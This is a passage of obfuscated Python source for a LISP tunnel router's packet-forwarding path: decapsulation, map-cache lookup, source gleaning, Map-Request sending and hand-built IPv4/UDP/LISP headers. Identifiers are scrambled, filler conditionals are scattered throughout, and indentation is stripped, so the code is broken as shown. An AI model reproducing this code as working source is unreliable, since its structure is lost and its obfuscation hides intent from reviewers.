if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
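#
# Convert a 4-byte packet field (network byte order) into a 32-bit integer.
#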
def I1IiIiiIiIII ( a ) :
iIIi = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( iIIi )
iiI1I1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
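#
# Fast data-plane path, enabled via LISP_RTR_FAST_DATA_PLANE. Decapsulates a
# plain (non-crypto) LISP data packet, looks up the inner destination in the
# map-cache, verifies or gleans the source mapping, then either forwards the
# packet natively or re-encapsulates it with a hand-built IPv4/UDP/LISP
# header and sends it on the raw socket. Returns True when the packet was
# fully handled here, False to fall back to the normal path. Uses the two
# module-level scratch lisp_address objects defined above.
#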
def I1Iii1 ( packet ) :
global lisp_map_cache , OOo
if 30 - 30: OoooooooOO - OoOoOO00
Ooo00O0o = o0O ( None , "Fast" )
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
I111i1i1111 = 0
IIII1 = None
if ( packet [ 9 ] == '\x11' ) :
if ( packet [ 20 : 22 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == '\x10\xf6' ) : return ( False )
if 10 - 10: I1Ii111 / ooOoO0o + i11iIiiIii / Ii1I
if ( packet [ 20 : 22 ] == '\x10\xf5' or packet [ 22 : 24 ] == '\x10\xf5' ) :
IIII1 = packet [ 12 : 16 ]
I111i1i1111 = packet [ 32 : 35 ]
I111i1i1111 = ord ( I111i1i1111 [ 0 ] ) << 16 | ord ( I111i1i1111 [ 1 ] ) << 8 | ord ( I111i1i1111 [ 2 ] )
if ( I111i1i1111 == 0xffffff ) : return ( False )
o00Oo0oooooo ( "Decap" , packet )
packet = packet [ 36 : : ]
if 74 - 74: OOooOOo + O0 + i1IIi - i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
o00Oo0oooooo ( "Receive" , packet )
if 46 - 46: IiII
if 45 - 45: ooOoO0o
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
ii1 = I1IiIiiIiIII ( packet [ 16 : 20 ] )
ooO . instance_id = I111i1i1111
ooO . address = ii1
if 1 - 1: ooOoO0o % iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % I1IiiI
if 89 - 89: Ii1I
if 76 - 76: ooOoO0o
if 15 - 15: OOooOOo . I11i + OoooooooOO - OoO0O00
if ( ( ii1 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 69 - 69: iIii1I11I1II1 . I1ii11iIi11i % ooOoO0o + iIii1I11I1II1 / O0 / I1ii11iIi11i
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
ii1 = ooO
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if 27 - 27: O0
if 79 - 79: o0oOOo0O0Ooo - I11i + o0oOOo0O0Ooo . oO0o
if 28 - 28: i1IIi - iII111i
if 54 - 54: iII111i - O0 % OOooOOo
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if ( IIII1 != None ) :
I11ii1i1 = I1IiIiiIiIII ( packet [ 12 : 16 ] )
iiI1I1 . instance_id = I111i1i1111
iiI1I1 . address = I11ii1i1
ooo0OoOOOOO = lisp . lisp_map_cache . lookup_cache ( iiI1I1 , False )
if ( ooo0OoOOOOO == None ) :
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( iiI1I1 , None ,
None )
if ( i1iIi1iI ) : return ( False )
elif ( ooo0OoOOOOO . gleaned ) :
IIII1 = I1IiIiiIiIII ( IIII1 )
if ( ooo0OoOOOOO . rloc_set [ 0 ] . rloc . address != IIII1 ) : return ( False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
O00o0OO0000oo . add_recent_source ( iiI1I1 )
if 59 - 59: OoooooooOO
if 47 - 47: ooOoO0o - I1IiiI / II111iiii
if 12 - 12: OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION and
O00o0OO0000oo . eid . instance_id == 0 ) :
ii1 . instance_id = lisp . lisp_default_secondary_iid
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if ( O00o0OO0000oo . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( O00o0OO0000oo . best_rloc_set == [ ] ) : return ( False )
if 7 - 7: OoooooooOO . IiII
ii1 = O00o0OO0000oo . best_rloc_set [ 0 ]
if ( ii1 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
I111i1i1111 = O00o0OO0000oo . eid . instance_id
OoOO = ii1 . translated_port
Oooo00 = ii1 . stats
ii1 = ii1 . rloc
I111iIi1 = ii1 . address
IIII1 = lisp . lisp_myrlocs [ 0 ] . address
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
o00 = '\x45\x00'
oO = len ( packet ) + 20 + 8 + 8
o00 += chr ( ( oO >> 8 ) & 0xff ) + chr ( oO & 0xff )
o00 += '\xff\xff\x40\x00\x10\x11\x00\x00'
o00 += chr ( ( IIII1 >> 24 ) & 0xff )
o00 += chr ( ( IIII1 >> 16 ) & 0xff )
o00 += chr ( ( IIII1 >> 8 ) & 0xff )
o00 += chr ( IIII1 & 0xff )
o00 += chr ( ( I111iIi1 >> 24 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 16 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 8 ) & 0xff )
o00 += chr ( I111iIi1 & 0xff )
o00 = lisp . lisp_ip_checksum ( o00 )
if 92 - 92: IiII * Oo0Ooo * Oo0Ooo * I1IiiI . iIii1I11I1II1
if 16 - 16: ooOoO0o % OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / OoooooooOO
if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
Ooooooo = oO - 20
I1IIIiI1I1ii1 = '\xff\x00' if ( OoOO == 4341 ) else '\x10\xf5'
I1IIIiI1I1ii1 += chr ( ( OoOO >> 8 ) & 0xff ) + chr ( OoOO & 0xff )
I1IIIiI1I1ii1 += chr ( ( Ooooooo >> 8 ) & 0xff ) + chr ( Ooooooo & 0xff ) + '\x00\x00'
if 30 - 30: O0 * OoooooooOO
I1IIIiI1I1ii1 += '\x08\xdf\xdf\xdf'
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 16 ) & 0xff )
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 8 ) & 0xff )
I1IIIiI1I1ii1 += chr ( I111i1i1111 & 0xff )
I1IIIiI1I1ii1 += '\x00'
if 38 - 38: IiII - I1ii11iIi11i . OoOoOO00 - I1Ii111 . OoooooooOO
if 89 - 89: iIii1I11I1II1
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
packet = o00 + I1IIIiI1I1ii1 + packet
o00Oo0oooooo ( "Encap" , packet )
else :
oO = len ( packet )
Oooo00 = O00o0OO0000oo . stats
o00Oo0oooooo ( "Send" , packet )
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
O00o0OO0000oo . last_refresh_time = time . time ( )
Oooo00 . increment ( oO )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
ii1 = ii1 . print_address_no_iid ( )
OOo . sendto ( packet , ( ii1 , 0 ) )
if 92 - 92: Oo0Ooo
o0O ( Ooo00O0o , "Fast" )
return ( True )
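#
# Main RTR packet-processing entry point, called for each packet delivered
# by the pcap/worker threads. Handles RLOC-probes and Info-Requests destined
# to the control plane, reassembles and decapsulates LISP data packets,
# gleans source mappings when allowed, looks up the inner destination in the
# map-cache (sending Map-Requests on misses), then re-encapsulates and
# forwards the packet, replicating over an RLE for multicast entries.
#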
def IIIii ( lisp_packet , thread_name ) :
global II1iII1i , O00OooOo00o , IiI11i1IIiiI
global OOo , Ii1IIii11
global oO0oIIII
global iIiiI1
global oo0Ooo0
if 60 - 60: I1ii11iIi11i * I1IiiI
Ooo00O0o = o0O ( None , "RTR" )
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if ( oo0Ooo0 ) :
if ( I1Iii1 ( lisp_packet . packet ) ) : return
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
Ooooo00o0OoO = lisp_packet
oooo0O0O0o0 = Ooooo00o0OoO . is_lisp_packet ( Ooooo00o0OoO . packet )
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if ( oooo0O0O0o0 == False ) :
oOoOOo0oo0 = Ooooo00o0OoO . packet
o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O = lisp . lisp_is_rloc_probe ( oOoOOo0oo0 , - 1 )
if ( oOoOOo0oo0 != o0O0Oo00Oo0o ) :
if ( OOOo == None ) : return
lisp . lisp_parse_packet ( II1iII1i , o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O )
return
if 39 - 39: OoooooooOO + oO0o % OOooOOo / OOooOOo
if 27 - 27: iII111i . I11i . iIii1I11I1II1 . iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
Ooooo00o0OoO . packet = lisp . lisp_reassemble ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if ( oooo0O0O0o0 ) :
if ( Ooooo00o0OoO . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , True )
Ooooo00o0OoO . strip_outer_headers ( )
else :
if ( Ooooo00o0OoO . decode ( False , None , None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
if 61 - 61: Oo0Ooo - I1Ii111 * II111iiii % ooOoO0o * iIii1I11I1II1 + OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if ( oooo0O0O0o0 and Ooooo00o0OoO . lisp_header . get_instance_id ( ) == 0xffffff ) :
II1I1iiIII1I1 = lisp . lisp_control_header ( )
II1I1iiIII1I1 . decode ( Ooooo00o0OoO . packet )
if ( II1I1iiIII1I1 . is_info_request ( ) ) :
o0Ooo0o0ooo0 = lisp . lisp_info ( )
o0Ooo0o0ooo0 . decode ( Ooooo00o0OoO . packet )
o0Ooo0o0ooo0 . print_info ( )
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
ooo = o0Ooo0o0ooo0 . hostname if ( o0Ooo0o0ooo0 . hostname != None ) else ""
OOOO0oooo = Ooooo00o0OoO . outer_source
o0o = Ooooo00o0OoO . udp_sport
if ( lisp . lisp_store_nat_info ( ooo , OOOO0oooo , o0o ) ) :
o00oo0 ( II1iII1i , ooo , OOOO0oooo , o0o )
if 51 - 51: O0 - i1IIi / I1IiiI
else :
OOOo = Ooooo00o0OoO . outer_source . print_address_no_iid ( )
oo0OOo0O = Ooooo00o0OoO . outer_ttl
Ooooo00o0OoO = Ooooo00o0OoO . packet
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 28 ] ) == False ) : oo0OOo0O = - 1
Ooooo00o0OoO = Ooooo00o0OoO [ 28 : : ]
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , 0 , oo0OOo0O )
if 37 - 37: o0oOOo0O0Ooo % ooOoO0o
return
if 83 - 83: OOooOOo . I1Ii111 + oO0o - OOooOOo * I1Ii111 / I1Ii111
if 39 - 39: I1Ii111 / Oo0Ooo % OoO0O00 % i11iIiiIii
if 90 - 90: I1Ii111 - OoooooooOO
if 96 - 96: O0 . Ii1I % OoO0O00 * iIii1I11I1II1
if 54 - 54: Ii1I * I1Ii111 - OoooooooOO % I1IiiI + O0
if 6 - 6: I1ii11iIi11i - II111iiii / oO0o + i11iIiiIii + OOooOOo
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if ( oooo0O0O0o0 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( Ooooo00o0OoO . packet ) )
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
I1i11II = None
if ( Ooooo00o0OoO . inner_dest . is_mac ( ) ) :
Ooooo00o0OoO . packet = lisp . lisp_mac_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( Ooooo00o0OoO . inner_version == 4 ) :
I1i11II , Ooooo00o0OoO . packet = lisp . lisp_ipv4_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
elif ( Ooooo00o0OoO . inner_version == 6 ) :
Ooooo00o0OoO . packet = lisp . lisp_ipv6_input ( Ooooo00o0OoO )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 31 - 31: oO0o / IiII * o0oOOo0O0Ooo . II111iiii
if 89 - 89: O0
if 2 - 2: I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i * o0oOOo0O0Ooo
if 100 - 100: Oo0Ooo % Ii1I / I11i
if 30 - 30: Oo0Ooo - OOooOOo - iII111i
if ( Ooooo00o0OoO . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , ed = "decap" ) == False ) : return
Ooooo00o0OoO . outer_source . afi = lisp . LISP_AFI_NONE
Ooooo00o0OoO . outer_dest . afi = lisp . LISP_AFI_NONE
if 81 - 81: o0oOOo0O0Ooo . OoooooooOO + OOooOOo * ooOoO0o
if 74 - 74: i1IIi + O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , None ,
Ooooo00o0OoO . outer_source )
if ( i1iIi1iI ) :
Ooo = Ooooo00o0OoO . packet if ( I1i11II ) else None
lisp . lisp_glean_map_cache ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . outer_source ,
Ooooo00o0OoO . udp_sport , Ooo )
if ( I1i11II ) : return
if 65 - 65: Oo0Ooo / I11i
if 12 - 12: I11i % OoOoOO00
if 48 - 48: iII111i . i11iIiiIii
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
oOO00O = Ooooo00o0OoO . inner_dest
if ( oOO00O . is_multicast_address ( ) ) :
ooo0OO = False
i1I11IiI1iiII , o00oOo0oOoo , iIi1IiI = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , oOO00O , None )
else :
ooo0OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( oOO00O , None , None )
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
Ooooo00o0OoO . gleaned_dest = ooo0OO
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest )
if ( O00o0OO0000oo ) : O00o0OO0000oo . add_recent_source ( Ooooo00o0OoO . inner_source )
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if ( O00o0OO0000oo and ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION or
O00o0OO0000oo . eid . address == 0 ) ) :
oo = lisp . lisp_db_for_lookups . lookup_cache ( Ooooo00o0OoO . inner_source , False )
if ( oo and oo . secondary_iid ) :
i1II1I = Ooooo00o0OoO . inner_dest
i1II1I . instance_id = oo . secondary_iid
if 95 - 95: OoO0O00 - OOooOOo / II111iiii % I1ii11iIi11i . o0oOOo0O0Ooo
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( Ooooo00o0OoO . inner_source , i1II1I )
if ( O00o0OO0000oo ) :
Ooooo00o0OoO . gleaned_dest = O00o0OO0000oo . gleaned
O00o0OO0000oo . add_recent_source ( Ooooo00o0OoO . inner_source )
else :
ooo0OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( i1II1I , None ,
None )
Ooooo00o0OoO . gleaned_dest = ooo0OO
if 24 - 24: i1IIi . i11iIiiIii
if 16 - 16: Oo0Ooo % I1ii11iIi11i + I11i - O0 . iII111i / I1Ii111
if 35 - 35: oO0o / I1Ii111 / II111iiii - iIii1I11I1II1 + II111iiii . I1Ii111
if 81 - 81: iII111i * OOooOOo - I1ii11iIi11i * Ii1I % OoOoOO00 * OoOoOO00
if 59 - 59: iIii1I11I1II1
if 7 - 7: OOooOOo * I1IiiI / o0oOOo0O0Ooo * i11iIiiIii
if 84 - 84: OOooOOo . iII111i
if 8 - 8: Oo0Ooo + II111iiii * OOooOOo * OoOoOO00 * I11i / IiII
if 21 - 21: oO0o / OoooooooOO
if ( O00o0OO0000oo == None and ooo0OO ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( Ooooo00o0OoO . inner_dest . print_address ( ) , False ) ) )
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
return
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo - OoooooooOO % OOooOOo * OoOoOO00
if ( O00o0OO0000oo == None or O00o0OO0000oo . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( Ooooo00o0OoO . inner_source ,
Ooooo00o0OoO . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest , None )
if 69 - 69: i1IIi
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "map-cache miss"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 71 - 71: II111iiii * iIii1I11I1II1 / I1ii11iIi11i
return
if 23 - 23: II111iiii
if 24 - 24: iIii1I11I1II1 + iIii1I11I1II1 * iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if ( O00o0OO0000oo and O00o0OO0000oo . is_active ( ) and O00o0OO0000oo . has_ttl_elapsed ( ) and
O00o0OO0000oo . gleaned == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( O00o0OO0000oo . print_eid_tuple ( ) , False ) ) )
if 39 - 39: iIii1I11I1II1 - OoooooooOO
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest , None )
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
O00o0OO0000oo . last_refresh_time = time . time ( )
O00o0OO0000oo . stats . increment ( len ( Ooooo00o0OoO . packet ) )
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
IIiIiiiIIIIi1 , iIi11 , O00O0 , iIiIiiiIi , i1iiIIi11I , o00oO0oOo00 = O00o0OO0000oo . select_rloc ( Ooooo00o0OoO , None )
if 80 - 80: ooOoO0o * O0
if 78 - 78: OoOoOO00
if ( IIiIiiiIIIIi1 == None and i1iiIIi11I == None ) :
if ( iIiIiiiIi == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
Ooooo00o0OoO . send_packet ( OOo , Ooooo00o0OoO . inner_dest )
if 20 - 20: iII111i % Ii1I . Ii1I / I11i + OoOoOO00 . Ii1I
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "not an EID"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 53 - 53: OOooOOo + I1IiiI / i11iIiiIii - o0oOOo0O0Ooo * oO0o / OoooooooOO
o0O ( Ooo00O0o , "RTR" )
return
if 89 - 89: iIii1I11I1II1 / I1IiiI - II111iiii / Ii1I . i11iIiiIii . Ii1I
ooOoOOOOo = "No reachable RLOCs found"
lisp . dprint ( ooOoOOOOo )
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 63 - 63: oO0o
return
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if ( IIiIiiiIIIIi1 and IIiIiiiIIIIi1 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 36 - 36: IiII
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "drop action"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
return
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
Ooooo00o0OoO . outer_tos = Ooooo00o0OoO . inner_tos
Ooooo00o0OoO . outer_ttl = Ooooo00o0OoO . inner_ttl
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if 94 - 94: I11i + II111iiii % i11iIiiIii
if ( IIiIiiiIIIIi1 ) :
Ooooo00o0OoO . encap_port = iIi11
if ( iIi11 == 0 ) : Ooooo00o0OoO . encap_port = lisp . LISP_DATA_PORT
Ooooo00o0OoO . outer_dest . copy_address ( IIiIiiiIIIIi1 )
i1i1IiIiIi1Ii = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_version = i1i1IiIiIi1Ii
